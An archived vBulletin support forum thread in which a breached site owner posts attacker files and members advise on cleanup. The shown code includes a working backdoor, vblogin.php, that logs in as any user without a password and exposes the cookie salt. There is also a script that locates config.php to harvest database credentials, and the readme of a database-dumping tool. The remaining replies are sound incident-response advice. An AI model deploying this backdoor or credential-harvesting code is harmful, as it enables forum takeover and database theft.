vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB4 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=251)
-   -   vBulletin hack with vblogin.php (https://vborg.vbsupport.ru/showthread.php?t=315275)

Muhammad Rahman 11-06-2014 07:42 AM
vBulletin hack with vblogin.php
 
cek this post : https://theadminzone.com/threads/vbu...2/#post-932481

Dave 11-06-2014 07:47 AM
What is the question?

Muhammad Rahman 11-06-2014 07:53 AM
Quote:
Originally Posted by Dave (Post 2521586)
What is the question?
only share information ..
hacker dump database .. cek my post at the admin zone

ozzy47 11-06-2014 09:30 AM
Well the post is deleted or hidden there, so we know nothing.

Muhammad Rahman 11-06-2014 09:47 AM
1 Attachment(s)
ok ..
this script vblogin.php

PHP Code:
<?php

require_once('./global.php');
define('SELF'$_SERVER['PHP_SELF']);

function verify_authentication2($username)
{
    global $vbulletin;

    $username strip_blank_ascii($username' ');
    $charset strtolower(vB_Template_Runtime::fetchStyleVar('charset')) == 'iso-8859-1' 'windows-1252' vB_Template_Runtime::fetchStyleVar('charset');
    $username preg_replace(
        '/&#([0-9]+);/ie',
        "convert_unicode_char_to_charset('\\1', '$charset')",
        $username
    );

    if ($vbulletin->userinfo $vbulletin->db->query_first("SELECT userid, usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " TABLE_PREFIX "user WHERE username = '" $vbulletin->db->escape_string(htmlspecialchars_uni($username)) . "'"))
    {
        set_authentication_cookies($cookieuser);

        $return_value true;
        ($hook vBulletinHook::fetch_hook('login_verify_success')) ? eval($hook) : false;
        return $return_value;
    }

    $return_value false;
    ($hook vBulletinHook::fetch_hook('login_verify_failure_username')) ? eval($hook) : false;
    return $return_value;
}

$guess = array();
$known = array(
    'archive',
    'clientscript',
    'cpstyles',
    'customavatars',
    'customgroupicons',
    'customprofilepics',
    'attach',
    'forumrunner',
    'images',
    'includes',
    'install',
    'packages',
    'signaturepics',
    'store_sitemap',
    'vb'
);
$admindir $vbulletin->config['Misc']['admincpdir'];
$complete $vbulletin->options['bburl'] . '/' $admindir '/index.php';
$results scandir('.');

foreach ($results as $result) {
    if ($result == '.' or $result == '..') continue;

    if (is_dir('./' $result)) {
        if(in_array($result$known)) continue;
        if(@file_exists($result '/adminlog.php'))
        {
            $guess[] = $result;
        } else {
            continue;
        }
    }
}

if(isset($_GET['do']) && $_GET['do'] == 'login' && isset($_GET['username']))
{
    require_once(DIR '/includes/functions_login.php');
    
    $username $_GET['username'];
    $q "SELECT username FROM " TABLE_PREFIX "user WHERE username = '" $vbulletin->db->escape_string($username) . "' OR userid = '" $vbulletin->db->escape_string($username) . "'";
    $query $vbulletin->db->query_first($q);
    if($query['username'] != null)
    {
        if(verify_authentication2($query['username']))
        {
            exec_unstrike_user($query['username']);
            
            process_new_login('cplogin'truenull);
            
            do_login_redirect();
        }
        else
        {
            die('Verify failed');
        }
    }
    else
    {
        die('User not found.');
    }
} else {
?>
<h1>vBulletin Login  | CP Login</h1>
<hr />
<form action="<?php echo SELF?>" method="get">
    <input type="hidden" name="do" value="login" />
    <input type="text" name="username" value="" />
    <input type="submit" name="login" value="Login as user" />
</form>
<hr />
<p>AdminCP directory detected in config: <a href="<?php echo $complete?>" target="_blank"><?php echo $complete?></a></p>
<p>Possible AdminCP directories (from existing subdirectories minus vBulletin standard): <?php foreach($guess as $dir) { echo '<a href="' $vbulletin->options['bburl'] . '/' $dir '/index.php" target="_blank">' $dir '</a> '; }?></p>
<hr />
<p>Table prefix: <?php echo TABLE_PREFIX?></P>
<p>Cookie prefix: <?php echo COOKIE_PREFIX?></P>
<p>Cookie salt: <?php echo COOKIE_SALT?></P>
<hr />
<?php
}

?>
Code:
                      __---__
                  _-      _--______
              __--( /    \ )XXXXXXXXXXXXX_
            --XXX(  O  O  )XXXXXXXXXXXXXXX-
          /XXX(      U    )        XXXXXXX\
        /XXXXX(              )--_  XXXXXXXXXXX\
        /XXXXX/ (      O    )  XXXXXX  \XXXXX\
        XXXXX/  /            XXXXXX  \__ \XXXXX----
        XXXXXX__/          XXXXXX        \__----  -
---___  XXX__/          XXXXXX      \__        ---
  --  --__/  ___/\  XXXXXX            /  ___---=
    -_    ___/    XXXXXX              '--- XXXXXX
      --\/XXX\ XXXXXX                      /XXXXX
        \XXXXXXXXX                        /XXXXX/
        \XXXXXX                        _/XXXXX/
          \XXXXX--__/              __-- XXXX/
            --XXXXXXX---------------  XXXXX--
              \XXXXXXXXXXXXXXXXXXXXXXXX-
                --XXXXXXXXXXXXXXXXXX-
          * * * * * who ya gonna call? * * * * *
                 
MySQL Dumper v2.1 Copyright ? 2013

How to use:
Unzip the file in a writeable directory.
Go to /msd/install.php
It may find vBulletin config information and fill the form out automatically. If not enter it manually.
Click install and enjoy.

This uses a staggered dump process to dump larger databases.
I have been able to dump a 2GB database just fine with this.
As far as my testing goes it should dump most DB's with ease.
There are a lot of variables that go into a server, therefore I can not gurantee your experience will be the same.
The script may timeout for you. I think that it should work well for the most part.
If you have any problems with it or suggestions you can Jabber me: plumm@jabber.org or find me at http://byteoverflow.net.

Some features:
Dump DB
Drop DB
View tables in DB
Dump single table
Drop table
Prune table (TRUNCATE)
Insert row into table
Explore inside of table
Delete row in table
Edit row in table
Search table
vBulletin hash dumper
Install script (install.php)
Will search for possible vB config files and fill the install form out automatically if found.

Please keep this text file in the folder and visit: http://byteoverflow.net.

Updates in 2.1:
Staggered compression for bigger DB's and tables. The script shouldn't time out now when compressing a larger DB. Compresses 50 MB of data at a time.
Edited CSS
Just edited a few other things.


I hope you all enjoy this tool, Plum
and this two attach msd.zip and msd1.zip

i hope someone can give explan how this script work..

ozzy47 11-06-2014 09:49 AM
Well you may have been hacked somehow.

Please read the following two blog posts:
http://www.vbulletin.com/forum/blogs...ve-been-hacked
http://www.vbulletin.com/forum/blogs...vbulletin-site

Dave 11-06-2014 09:50 AM
It's just a script which has some code copied from the real login.php file. After a successful login it redirect you to the admincp.

The second script is a database dumper.

Muhammad Rahman 11-06-2014 09:56 AM
Quote:
Originally Posted by ozzy47 (Post 2521602)
Well you may have been hacked somehow.

Please read the following two blog posts:
http://www.vbulletin.com/forum/blogs...ve-been-hacked
http://www.vbulletin.com/forum/blogs...vbulletin-site
ok. thanks :)

Quote:
Originally Posted by Dave (Post 2521603)
It's just a script which has some code copied from the real login.php file. After a successful login it redirect you to the admincp.

The second script is a database dumper.
but how hacker can upload to server

ozzy47 11-06-2014 09:57 AM
Quote:
Originally Posted by Muhammad Rahman (Post 2521604)
but how hacker can upload to server
Gonna be almost impossible to tell how they did it. Best thing to do is clean up everything, and secure the site/server.

Muhammad Rahman 11-06-2014 10:02 AM
Quote:
Originally Posted by ozzy47 (Post 2521605)
Gonna be almost impossible to tell how they did it. Best thing to do is clean up everything, and secure the site/server.
hacker try to find config.php

PHP Code:
$root_path CleanDir($_SERVER['DOCUMENT_ROOT']);
$path1 "$root_path/includes/config.php";
$path2 "$root_path/forum/includes/config.php";
$path3 "$root_path/forums/includes/config.php";
$path4 "$root_path/foro/includes/config.php";
$path5 "$root_path/foros/includes/config.php";
$path6 "$root_path/board/includes/config.php";
$path7 "$root_path/community/includes/config.php";
$path8 "$root_path/vb/includes/config.php";
$path9 "$root_path/vbulletin/includes/config.php";
if (file_exists($path1)) {
    include ($path1);
    $confighost $config['MasterServer']['servername'];
    $configuser $config['MasterServer']['username'];
    $configpassword $config['MasterServer']['password'];
    $configport $config['MasterServer']['port'];
    echo "<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (file_exists($path2)) {
    include ($path2);
    $confighost $config['MasterServer']['servername'];
    $configuser $config['MasterServer']['username'];
    $configpassword $config['MasterServer']['password'];
    $configport $config['MasterServer']['port'];
    echo "<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (file_exists($path3)) {
    include ($path3);
    $confighost $config['MasterServer']['servername'];
    $configuser $config['MasterServer']['username'];
    $configpassword $config['MasterServer']['password'];
    $configport $config['MasterServer']['port'];
    echo "<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (file_exists($path4)) {
    include ($path4);
    $confighost $config['MasterServer']['servername'];
    $configuser $config['MasterServer']['username'];
    $configpassword $config['MasterServer']['password'];
    $configport $config['MasterServer']['port'];
    echo "<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (file_exists($path5)) {
    include ($path5);
    $confighost $config['MasterServer']['servername'];
    $configuser $config['MasterServer']['username'];
    $configpassword $config['MasterServer']['password'];
    $configport $config['MasterServer']['port'];
    echo "<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (file_exists($path6)) {
    include ($path6);
    $confighost $config['MasterServer']['servername'];
    $configuser $config['MasterServer']['username'];
    $configpassword $config['MasterServer']['password'];
    $configport $config['MasterServer']['port'];
    echo "<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (file_exists($path7)) {
    include ($path7);
    $confighost $config['MasterServer']['servername'];
    $configuser $config['MasterServer']['username'];
    $configpassword $config['MasterServer']['password'];
    $configport $config['MasterServer']['port'];
    echo "<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (file_exists($path8)) {
    include ($path8);
    $confighost $config['MasterServer']['servername'];
    $configuser $config['MasterServer']['username'];
    $configpassword $config['MasterServer']['password'];
    $configport $config['MasterServer']['port'];
    echo "<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (file_exists($path9)) {
    include ($path9);
    $confighost $config['MasterServer']['servername'];
    $configuser $config['MasterServer']['username'];
    $configpassword $config['MasterServer']['password'];
    $configport $config['MasterServer']['port'];
    echo "<center><b><font color='green'>vB config information found!</font></b></center>";
} else {
    $confighost "localhost";
    $configuser "";
    $configpassword "";
    $configport "3306";
    echo "<center><b><font color='red'>No vB config information found!</font></b></center>";

thanks for information :)

Dave 11-06-2014 10:20 AM
It's hard to know how someone gained access to your server without having access to your vBulletin forum/logs.

Anything is possible such as: shared webhost breach, insecure vBulletin plugins, bad vBulletin configuration, other vulnerable software hosted on the server, etc.

You could start out by posting all of your plugins here.

Muhammad Rahman 11-06-2014 10:53 AM
Quote:
Originally Posted by Dave (Post 2521607)
It's hard to know how someone gained access to your server without having access to your vBulletin forum/logs.

Anything is possible such as: shared webhost breach, insecure vBulletin plugins, bad vBulletin configuration, other vulnerable software hosted on the server, etc.

You could start out by posting all of your plugins here.
i contact my server, don`t have any log hack .. they said hack from script, not from sever attack

this my plugin
  1. Adam's Subscribed Thread Notifications
  2. Advanced Application Forms (INACTIVE)
  3. BT - Social Group Message Quote
  4. Change Posts Owner
  5. Chip2love.9xpro - Limit new thread/post per day
  6. First Post on all pages (INACTIVE)
  7. Forum Category Icons (Advanced)
  8. Forum Runner (INACTIVE)
  9. GeekyDesigns Default Avatar
  10. Global Threads: The Next Generation FREE by BOP5
  11. GlowHost - Spam-O-Matic
  12. Helpful Answers (INACTIVE)
  13. iTrader (INACTIVE)
  14. Limit Posts Per Day in Threads by BOP5
  15. Make Prefixes Clickable to Filter Forumdisplay
  16. Mark Thread As 'Sold'
  17. Minimum Post Count Required To Post Blog Entries
  18. Mod-Mall BB Code Spoiler
  19. More Share Options for VB4 by BOP5 Light (INACTIVE)
  20. Nested Quotes
  21. Advanced User Tagging (DBTech)
  22. DBSeo (DBTech) (INACTIVE)
  23. Panjo (INACTIVE)
  24. PB Usergroup Choice on Registration (INACTIVE)
  25. Ajax Point System
  26. PostRelease (INACTIVE)
  27. ProvB - Extra Threadfields
  28. Rotating Banner System
  29. Skimlinks Plugin (INACTIVE)
  30. Subscription Notification System
  31. Tapatalk (INACTIVE)
  32. Thread Participants - by rellect
  33. Threads Started by User in Postbit & Profile
  34. User Article Count (INACTIVE)
  35. Usergroup Allow HTML
  36. vBadvanced CMPS
  37. vBulletin Blog (INACTIVE)
  38. vBulletin CMS (INACTIVE)
  39. vFcoders - Ajax First Post Collapsable Hack (INACTIVE)
  40. View your Threads or Posts from the Navbar
  41. VSa - Sub-Forum Manager (INACTIVE)
  42. WS vBulletin Tweet Poster
  43. XenForo Style Avatars
  44. [OzzModz] Exclude Forums From Activity Stream (INACTIVE)

ozzy47 11-06-2014 10:56 AM
Do you have anything listed under ACP --> Plugins & Products --> Plugin Manager in the group Product : vBulletin

Muhammad Rahman 11-06-2014 11:03 AM
Quote:
Originally Posted by ozzy47 (Post 2521611)
Do you have anything listed under ACP --> Plugins & Products --> Plugin Manager in the group Product : vBulletin
yes.. only my custom mod

Code:
ADD Fetch AVATAR URL        image_missing                [Edit] [Delete]
ADD FORUM NAV        parse_templates                [Edit] [Delete]
ADD RECENT EVENT CALENDAR        calendar_displaymonth_complete                [Edit] [Delete]
ADD RENDER FORUMLIST        forumbit_display                [Edit] [Delete]
ADD VAR FORUMDISPLAY        forumdisplay_complete                [Edit] [Delete]
ADD VAR SHOWGROUP        group_complete                [Edit] [Delete]
ADD VAR SHOWTHREAD        showthread_complete                [Edit] [Delete]
Auto display custom image when link images die in post        postbit_display_complete                [Edit] [Delete]
Avatar Header        parse_templates                [Edit] [Delete]
Avatar post lam - alif project        postbit_lite                [Edit] [Delete]
AVATAR THREAD        vba_cmps_module_recthreadsbits                [Edit] [Delete]
AVatar Thread Lam - alif Project        threadbit_display                [Edit] [Delete]
FG        activity_view_group                [Edit] [Delete]
FGD        fetch_template_complete                [Edit] [Delete]
FJB Mobile Iklan Terbaru        global_start                [Edit] [Delete]
FJB Newpost select category        parse_templates                [Edit] [Delete]
FJB_Kategori_Home        parse_templates                [Edit] [Delete]
FJB_Kategori_Navigasi        parse_templates                [Edit] [Delete]
Force Style        global_bootstrap_init_start                [Edit] [Delete]
Forum Kategori Navigasi        parse_templates                [Edit] [Delete]
Forum Newpost select category        parse_templates                [Edit] [Delete]
ghj        group_discussionbit_display_complete                [Edit] [Delete]
Kategori Sidebar        parse_templates                [Edit] [Delete]
Lintas Agama Terbaru        global_start                [Edit] [Delete]
Point Sistem Cache Template [Member info Block]        cache_templates                [Edit] [Delete]
REMOVE PREFIX Navbar        showthread_post_start                [Edit] [Delete]
SERP Date Group Discussion        group_discussionbit_display_complete                [Edit] [Delete]
SERP Date Group Message        group_messagebit_display_complete                [Edit] [Delete]
SERP Date Postbit        postbit_display_complete                [Edit] [Delete]
SERP Date Thread        threadbit_display                [Edit] [Delete]
Statistik Tab        member_build_blocks_start                [Edit] [Delete]
Tab Profile Default        member_build_blocks_start                [Edit] [Delete]
UNFORMAT        vbcms_article_populate_end                [Edit] [Delete]
ZP Event        global_start                [Edit] [Delete]
ZP Favorit Minggu Ini        global_start                [Edit] [Delete]
ZP Inspirasi Fashion        global_start                [Edit] [Delete]
ZP Recent Thread        global_start                [Edit] [Delete]

Dave 11-06-2014 11:18 AM
Check the FG, FGD, ghj and Lintas Agama Terbaru plugins because they have suspicious names which I never heard of. If unsure, post the contents of the plugins here.

Muhammad Rahman 11-06-2014 11:21 AM
Quote:
Originally Posted by Dave (Post 2521616)
Check the FG, FGD, ghj and Lintas Agama Terbaru plugins because they have suspicious names which I never heard of. If unsure, post the contents of the plugins here.
that plugin its my make with unique name ..

HM666 11-06-2014 03:57 PM
Have you overwritten the files with the vBulletin files downloaded from the members area? This is what you need to do to get rid of this problem for now. To my knowledge there is no vblogin.php file in the official download, its called login.php if I remember correctly. So as said before they modified this to use that file.

To find how they got in is a different matter. If you are running your forum on a shared server then that is more and likely how. Shared servers and just that...shared and less secure than a VPS or dedicated server. You can try and speak with your web host and see if they have any way to tell where the attack came from. Most likely the hacker gained access to your FTP and changed/uploaded files to your site.

RichieBoy67 11-06-2014 04:03 PM
Are you using any nulled plug ins? The nulled plug ins for Dbtech seo are known to do this. Be sure all your plug ins are licensed and up to date and that your file permissions are correct. Also that you have the latest patch for your Vbulletin version.

Once you find the hole you will need to change all server log ins, ftp, mysql, etc and admin logs.

TheLastSuperman 11-06-2014 05:00 PM
I saw the name Plum, he's one of the known powersurge hackers.

- You could have been hacked into long ago, spare admin accounts present?
- Even if you have disabled a mod/plugin the files still have the vulnerabilities present so m,ods such as Tapatalk which had a recent security exploit found should always be updated to the most secure version or removed entirely.
- Do as HM666 mentioned and overwrite all files, after that review the back-end and see if there's any spare admin accounts (use usergroup manager check for accounts w/ secondary usergroups assigned as well) and then check the plugins via the plugin manager as they can edit plugins after gaining access then finally check all files that were not overwritten and do not skip checking your attachments folder if stored in filesystem I've seen them hide files there too.

TheLastSuperman 11-06-2014 05:02 PM
Quote:
Originally Posted by Muhammad Rahman (Post 2521617)
that plugin its my make with unique name ..
You wrote it/them? If so check them again and be sure you coded them properly otherwise you could have a plethora of security issues that we'll never be aware of or able to offer assistance with and no do not post your code, if its a private mod/plugin all the better since code is not known I would review with another fellow coder or ask for assistance in the Private Coders Discussion forum.

RichieBoy67 11-06-2014 05:29 PM
Quote:
Originally Posted by TheLastSuperman (Post 2521654)
You wrote it/them? If so check them again and be sure you coded them properly otherwise you could have a plethora of security issues that we'll never be aware of or able to offer assistance with and no do not post your code, if its a private mod/plugin all the better since code is not known I would review with another fellow coder or ask for assistance in the Private Coders Discussion forum.
Ive seen the same hack embedded with hacked versions of Dbtechseo and Vbseo too.

I agree not to share the hack. :)

tbworld 11-06-2014 08:06 PM
Bottom line, he is probably going to have to hire someone to clean it all up and then add some isolation code with some additional tracking. If he hires the right professional he will learn a ton during the process. I would suggest paying extra to the consultant with this in mind. Find a consultant with great communication skills. Sorry you were hacked! (-- Yes, I know I changed grammatical person. --)

FYI: I do not run a business that assists others in vbulletin problems, programming or maintenance. Therefore, I am not saying this for my own benefit. :)

Muhammad Rahman 11-06-2014 08:55 PM
Quote:
Originally Posted by TheLastSuperman (Post 2521653)
I saw the name Plum, he's one of the known powersurge hackers.

- You could have been hacked into long ago, spare admin accounts present?
- Even if you have disabled a mod/plugin the files still have the vulnerabilities present so m,ods such as Tapatalk which had a recent security exploit found should always be updated to the most secure version or removed entirely.
- Do as HM666 mentioned and overwrite all files, after that review the back-end and see if there's any spare admin accounts (use usergroup manager check for accounts w/ secondary usergroups assigned as well) and then check the plugins via the plugin manager as they can edit plugins after gaining access then finally check all files that were not overwritten and do not skip checking your attachments folder if stored in filesystem I've seen them hide files there too.
- no, this first time
- oh no! Tapatalk not Update
- attachment now i changed back to database system :)

hacker delete all .htaccess file to have access to open protected directory ..

--------------- Added [DATE]1415314827[/DATE] at [TIME]1415314827[/TIME] ---------------

Quote:
Originally Posted by RichieBoy67 (Post 2521659)
Ive seen the same hack embedded with hacked versions of Dbtechseo and Vbseo too.

I agree not to share the hack. :)
so DBTech SEO not secure?

tbworld 11-06-2014 09:16 PM
Quote:
Originally Posted by Muhammad Rahman (Post 2521687)
so DBTech SEO not secure?
Once they have access to the root system they can hide whatever they want in the file system and the database. With a trained eye you can see how they hacked in via your logs - if you have a full set. You can sift through your logs to see what else they have changed, but depending on when you were hacked you could be at it for a while unless they used the same IP -- which they rarely do.

If you can rollback, then do so. Use a professional to add some isolation and tracking code in case you are hacked in the future and move on in your life. Plugins and modifications are always risky unless you know what you are doing. If you stay up-to-date with your modifications from Dbtech, you should be fairly safe. All software has the possibility to be hacked.

ozzy47 11-06-2014 10:19 PM
Quote:
Originally Posted by Muhammad Rahman (Post 2521687)
so DBTech SEO not secure?
If it was a nulled mod sure it is not secure, if you got it from here or their site it should be fine.

RichieBoy67 11-06-2014 10:25 PM
yeah, Dbtech mods are great. I meant a hacked/nulled version that some people try to get online so they can use with out a license. That always is asking for trouble.

If you bought it from DBtech or downloaded it here then I am sure it is something else.

Muhammad Rahman 11-06-2014 10:47 PM
Quote:
Originally Posted by ozzy47 (Post 2521694)
If it was a nulled mod sure it is not secure, if you got it from here or their site it should be fine.
Quote:
Originally Posted by RichieBoy67 (Post 2521695)
yeah, Dbtech mods are great. I meant a hacked/nulled version that some people try to get online so they can use with out a license. That always is asking for trouble.

If you bought it from DBtech or downloaded it here then I am sure it is something else.
since use vBulletin License .. I never use nulled mod ...
my hosting say hacker inject via script/mod to upload msd.zip and try find config.php to see database username and password .. and then run msd script ..,

ozzy47 11-06-2014 10:53 PM
Well I would follow all the stuff in the blogs I linked you to in post #6 https://vborg.vbsupport.ru/showthrea...02#post2521602

HM666 11-06-2014 11:05 PM
Muhammad when was your last back up of your site before this hack occurred? You may have to at the worst revert the site to that point when it was not hacked. That is a last ditch effort though and should only be done if nothing else can be, mainly because you would lose some data in that process so save that option for last but be prepared it might come down to that.

Steps you should take:

1. Go to members.vbulletin.com, login and download the same version that you are running on the site.

2. Unzip it and upload all the vbulletin core php files in binary only. You probably won't have to upload your images but you should check them just to be sure sometimes these hackers will change them. So download those from your web site and check them to be sure that they are not files that are hacked (or look like they are supposed to). If the images have been hacked them upload them as well but NOT in binary mode.

3. Go into your admincp and look on the left side column and find "Maintenance" click it to open if its not open and then go to "Diagnostics". Now on your right you will see "Suspect File Versions" click the "Submit" button under it. This will give you an idea of what files have been changed, are not part of vBulletin, or compromised. Just because it says that its not part of vBulletin does not mean that its a hacked file. It maybe a part of a mod you are using. But if there are weird ones or ones that really you do not remember uploading then download them to your PC desktop and check them in some thing like Dreamweaver or HTMLKit. You can check the code.

4. Go to "Usergroups>Usergroups Manager" Tick the drop down on the right and choose "Show All Primary Users" if you do not recognize an admin account try to delete it. If you cannot and it gives you a message about the account not being able to be changed then you will need to download your includes/config.php file and check the Undeletable Admin portion against the ID of that account in your admincp and take out the ID, save the file and upload it again. After you upload it again try to delete that admin account again.

5. Now still in the Usergroups Manager tick the drop down next to the Administrators and choose "Show All Secondary Users", again if you do not recognize the accounts delete them, if you cannot and get a error message then remove them from your config.php and try to delete them again.

6. Now go to "Styles & Templates" on the left side bar and click it to open if its not already open. Click on "Style Manager". Find the style you are using on the site. Click the drop down on the right and choose "Edit Templates". Click the first button next to "All Template Groups" it should look like this: << >> This will show all your templates. Scroll down and when you come across one that is in red open it and look to see if you see the hackers code in the template. If not cancel and move on to the next template in red. If you see the hackers code in your template then copy and paste all the template code into a notebook file and save it and then click on the template in the list and click the "Revert" button. You save the template in a notebook file just in case there is coding that has been changed and you need it. OR......you can just create a new skin and try working within it instead, but that would mean that any template modifications that have been done due to a mod or you have done personally would need to be redone. So that is up to you on that one which way you go. Once you have gone through all the templates and gotten rid of the hackers code if its there you should have been able to get rid of the hack by this point. If not...

Well if not then it might be in the database which is the worse case scenario I was discussing further up. This is where you might have to go to your last back up of the site before the hack happened.

After you get rid of the hack you will need to perform some basic things on the site to ensure that you are more secure in the future. You can find info on getting secure here: https://vborg.vbsupport.ru/showthrea...ghlight=hacked

Hope this helps and sorry if its was long winded or things you already knew to do.

--------------- Added [DATE]1415322405[/DATE] at [TIME]1415322405[/TIME] ---------------

Quote:
Originally Posted by Muhammad Rahman (Post 2521697)
since use vBulletin License .. I never use nulled mod ...
my hosting say hacker inject via script/mod to upload msd.zip and try find config.php to see database username and password .. and then run msd script ..,
Find and delete msd.zip and everything it may have created in your files.

msd is MySQL Dumper its a script that will dump your entire database! Its used for backups or to physically change your database. This would need to be removed immediately.

Muhammad Rahman 11-07-2014 12:06 AM
thanks HM666 ..
all file ready restore to before site hacked and not found msd folder again :)

HM666 11-07-2014 12:07 AM
Quote:
Originally Posted by Muhammad Rahman (Post 2521722)
thanks HM666 ..
all file ready restore to before site hacked and not found msd folder again :)
Awesome :)

ozzy47 11-07-2014 12:08 AM
Did you also follow all the instructions in the blog posts I linked you to?

Muhammad Rahman 11-07-2014 12:10 AM
Quote:
Originally Posted by ozzy47 (Post 2521724)
Did you also follow all the instructions in the blog posts I linked you to?
yes.. all instructions done! :)

ozzy47 11-07-2014 12:11 AM
Good stuff, hopefully you won't be hacked again. :)


All times are GMT. The time now is 06:13 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01723 seconds
  • Memory Usage 1,984KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (2)bbcode_code_printable
  • (2)bbcode_php_printable
  • (19)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (34)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete